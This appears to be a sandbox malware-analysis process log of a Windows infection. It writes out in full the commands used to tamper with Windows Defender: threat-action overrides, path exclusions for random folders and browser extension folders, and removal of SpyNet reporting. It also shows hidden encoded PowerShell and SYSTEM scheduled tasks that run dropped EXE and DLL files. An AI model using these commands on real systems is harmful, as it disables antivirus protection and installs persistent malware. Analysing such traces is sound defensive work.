C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:564 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:212 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:4772
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4896
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:3156
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:4224
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:1644
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:4300
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:1524
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:2548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:5012
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:4428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:2536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:4868
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:2296
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:3972
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:2424
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:1188
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:3388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:4156
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:1516
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:520
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:376
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:4736
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:5112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:2228
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:2208
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:3104
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:368
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EUszDIIxU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EUszDIIxU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FncWqVonEAflrVaxqNR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FncWqVonEAflrVaxqNR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IjchgTxaUtSoC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IjchgTxaUtSoC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\abetkicELaUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\abetkicELaUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rFkCZBmYGfkU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rFkCZBmYGfkU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\TtwSUYpchTTJbcVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\TtwSUYpchTTJbcVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\knkIMJmkYxNLeRxtR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\knkIMJmkYxNLeRxtR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\qMfgxxkvaFNxVGCk\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\qMfgxxkvaFNxVGCk\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1732 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EUszDIIxU" /t REG_DWORD /d 0 /reg:323⤵PID:2800
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EUszDIIxU" /t REG_DWORD /d 0 /reg:324⤵PID:1920
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EUszDIIxU" /t REG_DWORD /d 0 /reg:643⤵PID:476
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FncWqVonEAflrVaxqNR" /t REG_DWORD /d 0 /reg:323⤵PID:2284
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FncWqVonEAflrVaxqNR" /t REG_DWORD /d 0 /reg:643⤵PID:2640
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IjchgTxaUtSoC" /t REG_DWORD /d 0 /reg:323⤵PID:4752
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IjchgTxaUtSoC" /t REG_DWORD /d 0 /reg:643⤵PID:416
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\abetkicELaUn" /t REG_DWORD /d 0 /reg:323⤵PID:2004
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\abetkicELaUn" /t REG_DWORD /d 0 /reg:643⤵PID:2148
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rFkCZBmYGfkU2" /t REG_DWORD /d 0 /reg:323⤵PID:3056
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rFkCZBmYGfkU2" /t REG_DWORD /d 0 /reg:643⤵PID:424
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\TtwSUYpchTTJbcVB /t REG_DWORD /d 0 /reg:323⤵PID:2404
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\TtwSUYpchTTJbcVB /t REG_DWORD /d 0 /reg:643⤵PID:2776
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:1144
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:4928
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:3968
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:3104
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\knkIMJmkYxNLeRxtR /t REG_DWORD /d 0 /reg:323⤵PID:368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\knkIMJmkYxNLeRxtR /t REG_DWORD /d 0 /reg:643⤵PID:3208
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\qMfgxxkvaFNxVGCk /t REG_DWORD /d 0 /reg:323⤵PID:1576
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\qMfgxxkvaFNxVGCk /t REG_DWORD /d 0 /reg:643⤵PID:3780
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "glLVqNcIc" /SC once /ST 00:29:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:2132
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "glLVqNcIc"2⤵PID:2688
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "glLVqNcIc"2⤵PID:2492
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ULPYamQDIjWIhTUbi" /SC once /ST 00:51:45 /RU "SYSTEM" /TR "\"C:\Windows\Temp\qMfgxxkvaFNxVGCk\lXXVCSOPWGZMZyR\PdEQbdf.exe\" Rg /qosite_idQay 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1212
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ULPYamQDIjWIhTUbi"2⤵PID:2576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4896 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:520
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:424
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4928
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3104
-
C:\Windows\Temp\qMfgxxkvaFNxVGCk\lXXVCSOPWGZMZyR\PdEQbdf.exeC:\Windows\Temp\qMfgxxkvaFNxVGCk\lXXVCSOPWGZMZyR\PdEQbdf.exe Rg /qosite_idQay 525403 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3384 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bRiKnmLOZFdkMPGuzv"2⤵PID:60
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:3156
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:4500
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:2204
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:3664
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\EUszDIIxU\iYmHsr.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "PyTaEsvcdFypYsh" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:376
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PyTaEsvcdFypYsh2" /F /xml "C:\Program Files (x86)\EUszDIIxU\bmimjiL.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1212
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "PyTaEsvcdFypYsh"2⤵PID:4536
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "PyTaEsvcdFypYsh"2⤵PID:4904
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WwyRNVlKozxkMR" /F /xml "C:\Program Files (x86)\rFkCZBmYGfkU2\XadfikF.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2124
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OTILkGDakfAsN2" /F /xml "C:\ProgramData\TtwSUYpchTTJbcVB\WCquwgs.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2360
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GWxyEmjyURDtQJJTe2" /F /xml "C:\Program Files (x86)\FncWqVonEAflrVaxqNR\bnWItux.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3108
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "TyQOTUQyxpQhGBNnFCS2" /F /xml "C:\Program Files (x86)\IjchgTxaUtSoC\nTJuXzY.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4736
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "oYgNoNeTxNTUFfDli" /SC once /ST 00:45:47 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\qMfgxxkvaFNxVGCk\gAXPDAAA\JlGFjJW.dll\",#1 /Dhsite_idFAZ 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:424
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "oYgNoNeTxNTUFfDli"2⤵PID:1188
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:2028
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:4516
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:1492
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:392
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ULPYamQDIjWIhTUbi"2⤵PID:3148
-
-
